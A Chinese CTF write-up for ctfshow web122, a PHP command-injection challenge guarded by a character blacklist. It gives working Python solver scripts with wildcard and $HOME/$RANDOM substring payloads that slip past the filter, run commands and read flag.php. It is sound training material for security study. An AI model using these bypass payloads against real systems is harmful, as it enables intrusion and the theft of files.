[ctfshow web入门] web122

信息收集

这一题把HOME开放了，把#和PWD给过滤了

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['code'])){$code=$_POST['code'];if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|FLAG|PATH|BASH|PWD|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME|\/|\(|\)|\[|\]|\\\\|\+|\-|_|~|\!|\=|\^|\*|\x26|#|%|\>|\'|\"|\`|\||\,/', $code)){    if(strlen($code)>65){echo '<div align="center">'.'you are so long , I dont like '.'</div>';}else{echo '<div align="center">'.system($code).'</div>';}}else{echo '<div align="center">evil input</div>';}
}?>

解题

deepseek想了12分钟，也没给我准确的能绕过这个过滤构造出1的方法，答案也是错误的
答案给的>A配合$?可以直接构造1

import requests
from time import sleepurl = "http://aea25cb2-0314-400e-9fb0-a800499dea70.challenge.ctf.show/"  # http不要s
# . /tmp/php?????A ==> . /???/?h??????A
payload = "<A;. ${HOME::$?}???${HOME::$?}????????A"
file = { "file": "tac flag.php" }
data = { "code": payload }for i in range(1000):response = requests.request("POST", url, files=file, data=data)if (len(response.text)) != 3069: # len可能需要微调print(response.text)print(len(response.text))breakprint(i, end=" ")sleep(0.3)

构造命令

最好不要以4结尾，比较末尾带个4更为常见
/bin/base64 flag.php
/???/???6? ???.???

<A;${HOME::$?}???${HOME::$?}????${RANDOM::$?}? ????.???

要手工一直刷，运气不好得刷近百次所以直接写脚本了，我顺手把base64也解了
要是代码没解密base64，手动解一下就可以了

import requests
from time import sleep
import base64
url = "http://aea25cb2-0314-400e-9fb0-a800499dea70.challenge.ctf.show/"  # http不要s
# . /tmp/php?????A ==> . /???/?h??????A
payload = "<A;${HOME::$?}???${HOME::$?}????${RANDOM::$?}? ????.???"
data = { "code": payload }for i in range(1000):response = requests.request("POST", url, data=data)if (len(response.text)) != 3069: # len可能需要微调string = response.textprint(string)print(len(string))string = string[string.find('</code>')+len('</code>'):string.find('<div align="center">')].replace('\n', '')print(f"\n-------------------\n{string}\ndecode-base64: \n", base64.b64decode(string).decode())breakprint(i, end=" ")sleep(0.3)

web    目录    web